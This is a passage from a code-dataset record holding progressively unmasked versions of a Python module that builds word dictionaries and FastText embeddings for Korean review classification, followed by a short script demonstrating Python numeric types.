= np.zeros([len(word_dict), params['word_emb_dim']])\n if os.path.isfile(word_emb_pkl_path):\n with open(word_emb_pkl_path, 'rb') as f:\n word_emb = pickle.load(f)\n print('Existed trained word embedding loaded')\n else:\n fasttext_model = FastText.load_fasttext_format(fasttext_path,\n encoding='utf8')\n print('No word_emb pkl file, start making word_emb ...')\n for word, idx in word_dict.items():\n if idx == 0:\n continue\n else:\n try:\n word_emb[idx] = np.asarray(fasttext_model.wv[word])\n except KeyError:\n word_emb[idx] = np.random.uniform(-0.25, 0.25, params[\n 'word_emb_dim'])\n with open(word_emb_pkl_path, 'wb') as f:\n pickle.dump(word_emb, f)\n print('Making word_emb ... Done and Saved')\n return word_emb\n\n\ndef zero_padding(token_sentence, word_dict):\n padded_sentence = token_sentence + [word_dict[params['PAD']]] * (params\n ['max_seq_length'] - len(token_sentence))\n return padded_sentence\n\n\ndef dataset_iterator(filename, word_dict, batch_size):\n with open(filename, 'r', encoding='utf8') as f_dataset:\n context = []\n sequence_length = []\n label = []\n text = f_dataset.read().split('\\n')\n for line in text[1:]:\n class_label = [0, 0]\n review = line.split('\\t')[1]\n polarity = int(line.split('\\t')[2])\n class_label[polarity] = 1\n label.append(class_label)\n tokens = tokenizer.morphs(review)\n if len(tokens) > params['max_seq_length']:\n tokens = tokens[:params['max_seq_length']]\n sentence = [(word_dict[word] if word in word_dict else\n word_dict[params['UNK']]) for word in tokens]\n sequence_length.append(len(sentence))\n sentence = zero_padding(sentence, word_dict)\n context.append(sentence)\n if len(context) == batch_size:\n yield context, sequence_length, label\n context = []\n sequence_length = []\n label = []\n if len(context) > 0:\n yield context, sequence_length, label\n", "step-4": "import os\nimport os.path\nimport numpy as np\nimport pickle\nimport codecs\nfrom konlpy.tag import Okt\nfrom hyperparams import params\nfrom gensim.models import FastText\ntokenizer = Okt()\n\n\ndef make_word_dictionary(word_dict_pkl_path=params[\n 'default_word_dict_pkl_path'], training_data_path=params[\n 'default_training_data_path']):\n word_dict = dict()\n if os.path.isfile(word_dict_pkl_path):\n with open(word_dict_pkl_path, 'rb') as f:\n word_dict = pickle.load(f)\n print('Existed word_dict loaded')\n else:\n print('No word_dict pkl file, start making word_dict...')\n with codecs.open(training_data_path, 'r', encoding='utf-8') as f:\n word_vocab = dict()\n for line in f.read().split('\\n')[1:]:\n review = line.split('\\t')[1]\n tokens = tokenizer.morphs(review)\n for token in tokens:\n if token in word_vocab.keys():\n word_vocab[token] += 1\n else:\n word_vocab[token] = 1\n word_vocab = [word for word in word_vocab.keys() if word_vocab[\n word] >= params['min_vocab_count']]\n word_vocab = [params['PAD']] + word_vocab + [params['UNK']]\n for idx, word in enumerate(word_vocab):\n word_dict[word] = idx\n print('Making word_dict ... Done and Saved')\n with open(word_dict_pkl_path, 'wb') as f:\n pickle.dump(word_dict, f)\n return word_dict\n\n\ndef make_word_embedding(word_dict, word_emb_pkl_path=params[\n 'default_word_emb_pkl_path'], fasttext_path=params['default_fasttext_path']\n ):\n word_emb = np.zeros([len(word_dict), params['word_emb_dim']])\n if os.path.isfile(word_emb_pkl_path):\n with open(word_emb_pkl_path, 'rb') as f:\n word_emb = pickle.load(f)\n print('Existed trained word embedding loaded')\n else:\n fasttext_model = FastText.load_fasttext_format(fasttext_path,\n encoding='utf8')\n print('No word_emb pkl file, start making word_emb ...')\n for word, idx in word_dict.items():\n if idx == 0:\n continue\n else:\n try:\n word_emb[idx] = np.asarray(fasttext_model.wv[word])\n except KeyError:\n word_emb[idx] = np.random.uniform(-0.25, 0.25, params[\n 'word_emb_dim'])\n with open(word_emb_pkl_path, 'wb') as f:\n pickle.dump(word_emb, f)\n print('Making word_emb ... Done and Saved')\n return word_emb\n\n\ndef zero_padding(token_sentence, word_dict):\n padded_sentence = token_sentence + [word_dict[params['PAD']]] * (params\n ['max_seq_length'] - len(token_sentence))\n return padded_sentence\n\n\ndef dataset_iterator(filename, word_dict, batch_size):\n with open(filename, 'r', encoding='utf8') as f_dataset:\n context = []\n sequence_length = []\n label = []\n text = f_dataset.read().split('\\n')\n for line in text[1:]:\n class_label = [0, 0]\n review = line.split('\\t')[1]\n polarity = int(line.split('\\t')[2])\n class_label[polarity] = 1\n label.append(class_label)\n tokens = tokenizer.morphs(review)\n if len(tokens) > params['max_seq_length']:\n tokens = tokens[:params['max_seq_length']]\n sentence = [(word_dict[word] if word in word_dict else\n word_dict[params['UNK']]) for word in tokens]\n sequence_length.append(len(sentence))\n sentence = zero_padding(sentence, word_dict)\n context.append(sentence)\n if len(context) == batch_size:\n yield context, sequence_length, label\n context = []\n sequence_length = []\n label = []\n if len(context) > 0:\n yield context, sequence_length, label\n", "step-5": "import os\r\nimport os.path\r\nimport numpy as np\r\nimport pickle\r\nimport codecs\r\nfrom konlpy.tag import Okt\r\nfrom hyperparams import params\r\nfrom gensim.models import FastText\r\n\r\n#tokenizer\r\ntokenizer = Okt()\r\n\r\ndef make_word_dictionary(word_dict_pkl_path=params['default_word_dict_pkl_path'], training_data_path = params['default_training_data_path']):\r\n #word_dict => 'Word':'index'\r\n word_dict = dict()\r\n if os.path.isfile(word_dict_pkl_path):\r\n #if already existed, just load it\r\n with open(word_dict_pkl_path, 'rb') as f:\r\n word_dict = pickle.load(f)\r\n print('Existed word_dict loaded')\r\n else:\r\n print('No word_dict pkl file, start making word_dict...')\r\n with codecs.open(training_data_path, 'r', encoding='utf-8') as f:\r\n word_vocab = dict()\r\n # 'word':'frequency'\r\n for line in f.read().split('\\n')[1:]:\r\n review = line.split('\\t')[1]\r\n #tokenizing\r\n tokens = tokenizer.morphs(review)\r\n for token in tokens:\r\n if token in word_vocab.keys():\r\n word_vocab[token] += 1\r\n else:\r\n word_vocab[token] = 1\r\n word_vocab = [word for word in word_vocab.keys() if word_vocab[word] >= params['min_vocab_count']]\r\n # add pad & unk token\r\n word_vocab = [params['PAD']] + word_vocab + [params['UNK']]\r\n for idx, word in enumerate(word_vocab):\r\n word_dict[word] = idx\r\n print('Making word_dict ... Done and Saved')\r\n with open(word_dict_pkl_path, 'wb') as f:\r\n pickle.dump(word_dict, f)\r\n return word_dict\r\n\r\ndef make_word_embedding(word_dict, word_emb_pkl_path = params['default_word_emb_pkl_path'], fasttext_path = params['default_fasttext_path']):\r\n word_emb = np.zeros([len(word_dict), params['word_emb_dim']])\r\n if os.path.isfile(word_emb_pkl_path):\r\n with open(word_emb_pkl_path, 'rb') as f:\r\n word_emb = pickle.load(f)\r\n print('Existed trained word embedding loaded')\r\n else:\r\n #load fasttext model\r\n fasttext_model = FastText.load_fasttext_format(fasttext_path, encoding='utf8')\r\n print('No word_emb pkl file, start making word_emb ...')\r\n for word, idx in word_dict.items():\r\n if idx==0:\r\n # PAD = 0\r\n continue\r\n else:\r\n try:\r\n word_emb[idx] = np.asarray(fasttext_model.wv[word])\r\n except KeyError:\r\n # if there is no word vector for certain word, just assign random vector\r\n word_emb[idx] = np.random.uniform(-0.25, 0.25, params['word_emb_dim'])\r\n with open(word_emb_pkl_path, 'wb') as f:\r\n pickle.dump(word_emb, f)\r\n print('Making word_emb ... Done and Saved')\r\n return word_emb\r\n\r\ndef zero_padding(token_sentence, word_dict):\r\n #input : [1,4,3,2,1,15]\r\n #output : [1,4,3,2,1,15,0,0,0,0]\r\n padded_sentence = token_sentence + [word_dict[params['PAD']]]*(params['max_seq_length']-len(token_sentence))\r\n return padded_sentence\r\n\r\n\r\ndef dataset_iterator(filename, word_dict, batch_size):\r\n #yield batch for training\r\n with open(filename, 'r', encoding='utf8') as f_dataset:\r\n context = []\r\n sequence_length = []\r\n label = []\r\n text = f_dataset.read().split('\\n')\r\n for line in text[1:]:\r\n class_label = [0,0]\r\n review = line.split('\\t')[1]\r\n polarity = int(line.split('\\t')[2])\r\n class_label[polarity] = 1 #mark polarity\r\n label.append(class_label)\r\n tokens = tokenizer.morphs(review)\r\n #if the review is too long, cut it to adequate length\r\n if len(tokens) > params['max_seq_length']:\r\n tokens = tokens[:params['max_seq_length']]\r\n sentence = [word_dict[word] if word in word_dict else word_dict[params['UNK']] for word in tokens]\r\n sequence_length.append(len(sentence))\r\n sentence = zero_padding(sentence, word_dict)\r\n context.append(sentence)\r\n\r\n if len(context) == batch_size:\r\n yield (context, sequence_length, label)\r\n context =[]\r\n sequence_length = []\r\n label = []\r\n if len(context) > 0:\r\n yield (context, sequence_length, label)", "step-ids": [ 1, 3, 5, 6, 7 ] }
[ 1, 3, 5, 6, 7 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> print('a is type:', type(a)) print('c is type:', type(c)) print('e is type:', type(e)) print(a + b) print(d / c) print(b / a) print(b // a) print(e) print(e + f) print(sys.float_info) <|reserved_special_token_1|> <|reserved_special_token_0|> a = 3 b = 4 c = 5.66 d = 8.0 e = complex(c, d) f = complex(float(a), float(b)) print('a is type:', type(a)) print('c is type:', type(c)) print('e is type:', type(e)) print(a + b) print(d / c) print(b / a) print(b // a) print(e) print(e + f) print(sys.float_info) <|reserved_special_token_1|> import sys a = 3 b = 4 c = 5.66 d = 8.0 e = complex(c, d) f = complex(float(a), float(b)) print('a is type:', type(a)) print('c is type:', type(c)) print('e is type:', type(e)) print(a + b) print(d / c) print(b / a) print(b // a) print(e) print(e + f) print(sys.float_info) <|reserved_special_token_1|> import sys a = 3 b = 4 c = 5.66 d = 8.0 e = complex(c,d) f = complex(float(a),float(b)) print("a is type:",type(a)) print("c is type:",type(c)) print("e is type:",type(e)) print(a + b) print(d / c) print(b / a) #2个除约成整型 print(b // a) print(e) print(e + f) print(sys.float_info)
flexible
{ "blob_id": "2876c9f8db0395143b165b855b22e364e3cc8121", "index": 9008, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint('a is type:', type(a))\nprint('c is type:', type(c))\nprint('e is type:', type(e))\nprint(a + b)\nprint(d / c)\nprint(b / a)\nprint(b // a)\nprint(e)\nprint(e + f)\nprint(sys.float_info)\n", "step-3": "<mask token>\na = 3\nb = 4\nc = 5.66\nd = 8.0\ne = complex(c, d)\nf = complex(float(a), float(b))\nprint('a is type:', type(a))\nprint('c is type:', type(c))\nprint('e is type:', type(e))\nprint(a + b)\nprint(d / c)\nprint(b / a)\nprint(b // a)\nprint(e)\nprint(e + f)\nprint(sys.float_info)\n", "step-4": "import sys\na = 3\nb = 4\nc = 5.66\nd = 8.0\ne = complex(c, d)\nf = complex(float(a), float(b))\nprint('a is type:', type(a))\nprint('c is type:', type(c))\nprint('e is type:', type(e))\nprint(a + b)\nprint(d / c)\nprint(b / a)\nprint(b // a)\nprint(e)\nprint(e + f)\nprint(sys.float_info)\n", "step-5": "import sys\n\na = 3\nb = 4\n\nc = 5.66\nd = 8.0\n\ne = complex(c,d)\nf = complex(float(a),float(b))\n\nprint(\"a is type:\",type(a))\nprint(\"c is type:\",type(c))\nprint(\"e is type:\",type(e))\n\nprint(a + b)\nprint(d / c)\n\nprint(b / a)\n#2个除约成整型\nprint(b // a)\n\nprint(e)\nprint(e + f)\n\nprint(sys.float_info)", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def test_xyz123(): cone_x = bc.primitives.Cone(1.0, 1.0) <|reserved_special_token_1|> __author__ = 'jjpr' <|reserved_special_token_0|> def test_xyz123(): cone_x = bc.primitives.Cone(1.0, 1.0) <|reserved_special_token_1|> __author__ = 'jjpr' import pyrr import barleycorn as bc def test_xyz123(): cone_x = bc.primitives.Cone(1.0, 1.0)
flexible
{ "blob_id": "e6af221f1d6397d0fc52671cdd27d43549d0aecb", "index": 513, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n", "step-3": "__author__ = 'jjpr'\n<mask token>\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n", "step-4": "__author__ = 'jjpr'\nimport pyrr\nimport barleycorn as bc\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import sys import random import pygame import pygame.locals import time # TODO high scores, difficulties # Absolutes (in pixels where not otherwise stated) CELL_SIDE_LENGTH = 40 # Side length of each cell CELL_MARGIN = 2 # Gap between cells GRID_HEIGHT = 10 # How many cells are in the grid GRID_WIDTH = 10 X_BOARD_MARGIN = 50 # Gap between grid and sides of board Y_BOARD_MARGIN = 75 MENU_MARGIN = 100 # Amount of space on the right dedicated to the menu DIFFICULTY = 0.1 # Ratio of bombs (10% by default) FPS = 30 # frames per second (window refresh speed) # Relatives (so board size can easily be changed) NUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY) # Default about 10% of the board is mines WINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT) + (CELL_MARGIN * GRID_HEIGHT) + (Y_BOARD_MARGIN * 2) WINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH) + (CELL_MARGIN * GRID_WIDTH) + (X_BOARD_MARGIN * 2) + MENU_MARGIN # R G B (not all used, but kept so theme can easily be changed) RED = (255, 0, 0) YELLOW = (255, 255, 0) GREEN = (0, 255, 0) MIDGREEN = (40, 190, 40) CYAN = (0, 255, 255) BLUE = (0, 0, 255) DARKBLUE = (20, 20, 60) MAGENTA = (255, 0, 255) BLACK = (0, 0, 0) WHITE = (255, 255, 255) GRAY = (200, 200, 200) BG_COLOR = DARKBLUE # Background color CELL_COLOR = GRAY # Universal cover color HIGHLIGHT_COLOR = CYAN # Cell the cursor is currently hovering over FLAG_COLOR = MIDGREEN # Symbols FLAG = 'flag' MINE = 'mine' CLEAR = 'clear' class Game: def __init__(self): pygame.init() global CLOCK, SURFACE CLOCK = pygame.time.Clock() SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT)) self.mouse_x = 0 # Stores x-coordinate of mouse event self.mouse_y = 0 # Stores y-coordinate of mouse event pygame.display.set_caption('Minesweeper by Alyssa Moore 2017') self.board = self.get_board() self.revealed_cells = self.generate_data(False) self.flags = self.generate_data(False) self.questionmarks = self.generate_data(False) self.game_over = False self.timer = Stopwatch() SURFACE.fill(BG_COLOR) def main(self): while True: left_click = False right_click = False SURFACE.fill(BG_COLOR) self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks) self.create_menu() font = pygame.font.SysFont("times new roman", 25) # Timer (will be used to implement high scores) self.timer.start() t1 = self.timer.get_seconds() label = font.render(str(t1), 1, MAGENTA) SURFACE.blit(label, (50, 50)) # Mouse event handling for event in pygame.event.get(): if event.type == pygame.locals.QUIT: pygame.quit() sys.exit() # Even if the window closes, we still need to manually stop the processes elif event.type == pygame.locals.MOUSEMOTION: self.mouse_x, self.mouse_y = event.pos # For hovering info elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1: # Left click self.mouse_x, self.mouse_y = event.pos print(self.mouse_x, self.mouse_y) left_click = True elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3: # Right click self.mouse_x, self.mouse_y = event.pos right_click = True # If user decided to start over, reinitialize game if self.game_over and right_click: self.board = self.get_board() self.revealed_cells = self.generate_data(False) self.flags = self.generate_data(False) self.questionmarks = self.generate_data(False) self.game_over = False self.timer = Stopwatch() right_click = False # TODO tweak spacing on text if self.game_over: self.timer.pause() score = self.timer.get_seconds() a_x = X_BOARD_MARGIN + ((GRID_WIDTH / 4) * CELL_SIDE_LENGTH) b_y = Y_BOARD_MARGIN + (Y_BOARD_MARGIN / 4) + (GRID_HEIGHT * CELL_SIDE_LENGTH) + (GRID_HEIGHT * CELL_MARGIN) font = pygame.font.SysFont("times new roman", 25) if win: label = font.render('Congratulations, you won!', 1, GREEN) SURFACE.blit(label, (a_x - 75, b_y)) label = font.render('Score: ' + str(score), 1, GREEN) SURFACE.blit(label, (a_x + 200, b_y)) else: label = font.render('GAME OVER', 1, RED) SURFACE.blit(label, (a_x + 10, b_y)) label = font.render('Press RIGHT mouse button', 1, YELLOW) SURFACE.blit(label, (a_x - 50, b_y + 25)) cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y) if cell_x is not None and cell_y is not None: # If mouse is hovering over a cell during mouse event # Highlight cell if not self.revealed_cells[cell_x][cell_y] and not self.game_over: self.highlight_cell(cell_x, cell_y) # Digging somewhere if not self.revealed_cells[cell_x][cell_y] and left_click and not self.game_over: # So you can't accidentally click a flagged/question mark space if not self.flags[cell_x][cell_y] and not self.questionmarks[cell_x][cell_y]: self.flags[cell_x][cell_y] = False if self.board[cell_x][cell_y][0] == MINE: # If you dig a mine, reveal all cells & game over self.revealed_cells = self.generate_data(True) self.game_over = True elif self.board[cell_x][cell_y][0] == CLEAR: # If you dig a clear cell, reveal that cell self.reveal_cells(cell_x, cell_y, self.board, self.revealed_cells, self.flags, self.questionmarks) else: self.revealed_cells[cell_x][cell_y] = True # Set the cell as revealed # Redraw board after mouse event self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks) # Placing a flag- if flag already there, change flag to question mark. # If question mark already there, turn to nothing. If nothing there, turn on flag if not self.revealed_cells[cell_x][cell_y] and right_click and not self.game_over: if self.flags[cell_x][cell_y]: self.flags[cell_x][cell_y] = False self.questionmarks[cell_x][cell_y] = True elif self.questionmarks[cell_x][cell_y]: self.questionmarks[cell_x][cell_y] = False self.flags[cell_x][cell_y] = False else: self.flags[cell_x][cell_y] = True self.questionmarks[cell_x][cell_y] = False # Flag is drawn in this method call self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks) # This block decides whether or not the player has won yet after a mouse event win = True for x in range(GRID_WIDTH): # If a cell is a mine and not flagged, or if a cell is clear for y in range(GRID_HEIGHT): # but not revealed, then the game is not yet over if (self.board[x][y][0] == MINE and not self.flags[x][y]) or ( self.board[x][y][0] != MINE and not self.revealed_cells[x][y]): win = False if win: self.game_over = True # Redraw the screen and wait for clock tick pygame.display.update() CLOCK.tick(FPS) @staticmethod def get_board(): icons = [] mines = 0 # Bottom of board is made of only mines and clear cells, which is then selectively covered for gameplay # Making randomized array for x in range(GRID_WIDTH): for y in range(GRID_HEIGHT): if mines < NUM_MINES: icons.append((MINE, RED)) mines += 1 else: icons.append((CLEAR, WHITE)) random.shuffle(icons) # Create static under-board board = [] for x in range(GRID_WIDTH): column = [] for y in range(GRID_HEIGHT): column.append(icons[0]) del icons[0] # so the next icon[0] is the one after this board.append(column) # This block determines how many mines are around each cell, and adds the number to the board's array for x in range(GRID_WIDTH): for y in range(GRID_HEIGHT): mines = 0 if x > 0: if y > 0: # If not on the left edge AND not on top edge if board[x - 1][y - 1][0] == MINE: mines += 1 if board[x - 1][y][0] == MINE: mines += 1 if y < GRID_HEIGHT - 1: if board[x - 1][y + 1][0] == MINE: mines += 1 if x < GRID_WIDTH - 1: if y > 0: # If not on right edge AND not on top edge if board[x + 1][y - 1][0] == MINE: mines += 1 if board[x + 1][y][0] == MINE: mines += 1 if y < GRID_HEIGHT - 1: if board[x + 1][y + 1][0] == MINE: mines += 1 if y > 0: # If not on right or left edge AND not on top edge if board[x][y - 1][0] == MINE: mines += 1 if y < GRID_HEIGHT - 1: # If not on riht or left edge AND on bottom edge if board[x][y + 1][0] == MINE: mines += 1 # If the cell is clear and there are mines around it, add the number of mines to board array if board[x][y][0] != MINE: if mines in range(1, 9): board[x][y] = (str(mines), WHITE) return board # Used to show full board on game over & reset board on game start @staticmethod def generate_data(val): clear = [] for i in range(GRID_WIDTH): clear.append([val] * GRID_HEIGHT) return clear # Convert row, column coordinates into x, y pixel coordinates (for drawing shapes) @staticmethod def get_top_left_coordinates(row, column): left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN return left, top # Convert x, y pixel coordinates to row, column coordinates (for mouse hovering) def get_cell_at_pixel(self, x, y): for cell_x in range(GRID_WIDTH): for cell_y in range(GRID_HEIGHT): left, top = self.get_top_left_coordinates(cell_x, cell_y) cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH) if cell_rect.collidepoint(x, y): # If currently hovering over a cell return cell_x, cell_y return None, None # If not currently hovering over a cell # Redraws board after mouse event def draw_board(self, board, revealed, flags, questionmarks): for cell_x in range(GRID_WIDTH): for cell_y in range(GRID_HEIGHT): left, top = self.get_top_left_coordinates(cell_x, cell_y) # Symbols not added on board creation must be drawn here: "unrevealed" boxes, flags, and question marks if not revealed[cell_x][cell_y]: # Draw a gray box over unrevealed cell, so value isn't affected but user can't see the value pygame.draw.rect(SURFACE, CELL_COLOR, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)) if flags[cell_x][cell_y]: half = int(CELL_SIDE_LENGTH * 0.5) # Relative point halfway through cell # top point, bottom left point, bottom right point pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half + left, top), (left, top + CELL_SIDE_LENGTH - CELL_MARGIN/2), (left + CELL_SIDE_LENGTH - CELL_MARGIN/2, top + CELL_SIDE_LENGTH - CELL_MARGIN/2)]) elif questionmarks[cell_x][cell_y]: quarter = int(CELL_SIDE_LENGTH * 0.25) pygame.draw.rect(SURFACE, GRAY, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)) fontsize = int(CELL_SIDE_LENGTH) font = pygame.font.SysFont("times new roman", fontsize) label = font.render("?", 1, BLACK) SURFACE.blit(label, (left + quarter, top)) else: # Draw revealed cells shape, color = self.get_shape_and_color(board, cell_x, cell_y) self.draw_icon(shape, color, cell_x, cell_y) # Draws icon passed to it in the stated cell def draw_icon(self, shape, color, cell_x, cell_y): # Relative point of quarter-way through cell quarter = int(CELL_SIDE_LENGTH * 0.25) left, top = self.get_top_left_coordinates(cell_x, cell_y) # Drawing of all images starts at top left corner # Draw the shapes if shape == CLEAR: pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)) elif shape == MINE: pygame.draw.ellipse(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)) # Flag shape & question mark in draw_board because they are activated via mouse event else: # Clear with num pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)) fontsize = int(CELL_SIDE_LENGTH) font = pygame.font.SysFont("times new roman", fontsize) label = font.render(shape, 1, BLACK) # a cell with number corresponds to shapes "1", "2", etc. SURFACE.blit(label, (left + quarter, top)) # Returns the shape and color of icon to be created in draw_icon method @staticmethod def get_shape_and_color(board, cell_x, cell_y): # shape value for cell x, y is stored in board[x][y][0], color value in board[x][y][1] return board[cell_x][cell_y][0], board[cell_x][cell_y][1] # Draws a box around the cell the mouse is hovering over, 'highlighting' it def highlight_cell(self, cell_x, cell_y): left, top = self.get_top_left_coordinates(cell_x, cell_y) # Changes with cell size, but line width is hard-set at 2px (last argument) pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - (CELL_MARGIN / 2), top - (CELL_MARGIN / 2), CELL_SIDE_LENGTH + CELL_MARGIN, CELL_SIDE_LENGTH + CELL_MARGIN), 2) # Reveals clear cells next to clear cell the user clicked (and clear cells next to those cells, etc.) def reveal_cells(self, x, y, board, revealed, flags, questionmarks): if revealed[x][y]: # If the cell is already revealed, do nothing return if flags[x][y]: # If the cell already has a flag on it, do nothing return revealed[x][y] = True if board[x][y][0] != CLEAR: return if x > 0: if y > 0: self.reveal_cells(x - 1, y - 1, board, revealed, flags, questionmarks) self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks) if y < GRID_HEIGHT - 1: self.reveal_cells(x - 1, y + 1, board, revealed, flags, questionmarks) if x < GRID_WIDTH - 1: if y > 0: self.reveal_cells(x + 1, y - 1, board, revealed, flags, questionmarks) self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks) if y < GRID_HEIGHT - 1: self.reveal_cells(x + 1, y + 1, board, revealed, flags, questionmarks) if y > 0: self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks) if y < GRID_HEIGHT - 1: self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks) @staticmethod def create_menu(): font = pygame.font.SysFont("times new roman", 20) label = font.render(" High scores", 1, BLACK) pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50)) # view high scores SURFACE.blit(label, (500, 135)) class Stopwatch: def __init__(self): self.seconds = 0 self.running = False self.latest_time = None def start(self): if not self.running: self.running = True self.latest_time = time.time() def get_seconds(self): t1 = self.seconds if self.running: t1 += time.time() - self.latest_time return int(t1) def pause(self): if self.running: self.running = False self.seconds += time.time() - self.latest_time g = Game() g.main()
normal
{ "blob_id": "030bc0c7bdbbb09f722ffe4c82866726062f5317", "index": 1962, "step-1": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n <mask token>\n <mask token>\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n <mask token>\n <mask token>\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n <mask token>\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n <mask token>\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = 